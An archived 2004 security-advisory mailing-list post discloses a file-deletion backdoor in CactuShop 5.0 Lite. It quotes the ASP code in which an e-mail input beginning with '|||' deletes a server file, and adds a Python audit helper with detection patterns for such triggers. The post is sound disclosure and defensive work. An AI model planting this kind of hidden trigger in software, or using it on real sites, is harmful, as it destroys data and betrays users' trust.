Message-ID: <40238270.9060301@s-quadra.com>
Date: Fri, 06 Feb 2004 15:02:56 +0300
From: S-Quadra Security Research <research@...uadra.com>
To: full-disclosure <full-disclosure@...ts.netsys.com>,
   bugtraq <bugtraq@...urityfocus.com>
Subject: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor


       S-Quadra Advisory #2004-02-06

Topic: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor
Severity: High
Vendor URL: http://www.cactushop.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040206.txt
Release date: 06 Feb 2004

 1. DESCRIPTION

 CactuShop is an ASP application for running an e-commerce web site. It
incorporates a databased catalogue system, front end pages for product
navigation, back end pages for updating product details and robust basket
code for memorizing product selections as a visitor moves around the web
site. ASP software is designed to run on a Microsoft NT or Win 2000 server.
Please visit http://www.cactushop.com for information about the CactuShop
shopping cart.

 2. DETAILS

 There is a backdoor in the 5.0 Lite version of CactuShop that allows a
remote attacker to delete any file on the target system.

 The offending code can be found in the includes/functions.asp file. The
AddToMailingList() function implemented in this file adds a user's email
address to the store mailing list. This function checks the provided email
address and, if it starts with '|||', the rest of the address is interpreted
as the name of the file to be deleted. Below is a snippet of the source code:

 Function AddToMailingList(strEmailAddress, strFormValue, htmlvalue)
 ......
   '---------------------------------
   'CHECK IF IT'S VALID
   '---------------------------------
   if strEmailAddress <> "" then
       'Backdoor: an "address" beginning with ||| is not validated; the rest
       'of it is used as a file name relative to the current directory and deleted
       If Left(strEmailAddress, 3) = "|||" Then
           Server.CreateObject("Scripting.FileSystemObject").DeleteFile(Server.MapPath("./") & Mid(strEmailAddress, 4))
           AddToMailingList = GetString("ContentText_EmailAddressNotValid") & " " & strEmailFrom & "."
           Exit Function
       End If
   else
       AddToMailingList = GetString("ContentText_NoEmailAddressEntered")
       Exit Function
   end if
 ......
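
 As an added example (not part of this advisory or of the CactuShop code), the
following Python audit helper flags the pattern described above in ASP source:
a magic-prefix check on a string variable followed within a few lines by a
destructive Scripting.FileSystemObject call, alongside an allow-list e-mail
validator of the kind AddToMailingList should have applied. The sample source
is the snippet quoted above embedded as a constructed string; the regular
expressions and function names are this example's own assumptions.

```python
import re

# Constructed sample: the snippet from includes/functions.asp quoted in the
# advisory, embedded as a string so the audit runs offline.
SAMPLE_ASP = '''Function AddToMailingList(strEmailAddress, strFormValue, htmlvalue)
   if strEmailAddress <> "" then
       If Left(strEmailAddress, 3) = "|||" Then
           Server.CreateObject("Scripting.FileSystemObject").DeleteFile(Server.MapPath("./") & Mid(strEmailAddress, 4))
           AddToMailingList = GetString("ContentText_EmailAddressNotValid") & " " & strEmailFrom & "."
           Exit Function
       End If
   end if
End Function
'''

# Destructive Scripting.FileSystemObject methods worth reviewing in any ASP code audit.
FSO_DESTRUCTIVE = re.compile(
    r'\b(DeleteFile|DeleteFolder|MoveFile|CopyFile|CreateTextFile)\s*\(', re.IGNORECASE)
# A magic-prefix trigger on a string variable: Left(variable, n) = "literal"
MAGIC_PREFIX = re.compile(
    r'Left\s*\(\s*(\w+)\s*,\s*\d+\s*\)\s*=\s*"([^"]+)"', re.IGNORECASE)

def audit_asp(source):
    """Return (line_no, kind, detail) for every suspicious line in `source`."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        m = MAGIC_PREFIX.search(line)
        if m:
            findings.append((no, 'magic-prefix', f'{m.group(1)} compared with "{m.group(2)}"'))
        m = FSO_DESTRUCTIVE.search(line)
        if m:
            findings.append((no, 'fso-call', m.group(1)))
    return findings

def backdoor_candidates(source, window=3):
    """Pair each magic-prefix check with a destructive FSO call at most `window`
    lines below it, the shape of the CactuShop backdoor: trigger, then deletion."""
    findings = audit_asp(source)
    triggers = [(n, d) for n, k, d in findings if k == 'magic-prefix']
    calls = [(n, d) for n, k, d in findings if k == 'fso-call']
    return [(tn, cn, td, cd) for tn, td in triggers
            for cn, cd in calls if 0 < cn - tn <= window]

# Allow-list validation of the kind AddToMailingList should have done; a "|||" prefix fails it.
EMAIL_OK = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')

def validate_email(value):
    """Return True only for a plausible e-mail address; the value is never used as a path."""
    return EMAIL_OK.fullmatch(value.strip()) is not None
```

Running backdoor_candidates(SAMPLE_ASP) reports the Left(...) = "|||" check on line 3 paired with the DeleteFile call on line 4; the same functions can be pointed at any real .asp file read from disk.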
 
 3. FIX INFORMATION

 S-Quadra alerted CactuShop development team to these issues on 05 Feb 2004.
The following response has been received:

 "The lite version of our software DOES have backdoors. It IS NOT intended
for live use. Users are specifically prohibited from using it as such!!!
If people are using this software on a live site then they are violating our
license agreement. The full version of the software is secure."

 The CactuShop Lite license agreement indeed states that "IF YOU WISH TO USE
THE SOFTWARE ON A LIVE WEB SITE YOU MUST PURCHASE THE FULL VERSION. CACTUSOFT
RESERVES THE RIGHT TO TAKE BOTH LEGAL AND TECHNICAL STEPS TO PREVENT USE OF
CACTUSHOP LITE IN BREACH OF THIS AGREEMENT...", but we believe that the public
should be informed about the presence of the backdoor in CactuShop Lite.

 4. CREDITS

 Nick Gudov <cipher@...uadra.com> is responsible for discovering this issue.

 5. ABOUT

 S-Quadra offers services in computer security, penetration testing and
network assessment, web application security, source code review and third
party product vulnerability assessment, forensic support and reverse
engineering.

          S-Quadra Advisory #2004-02-06

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

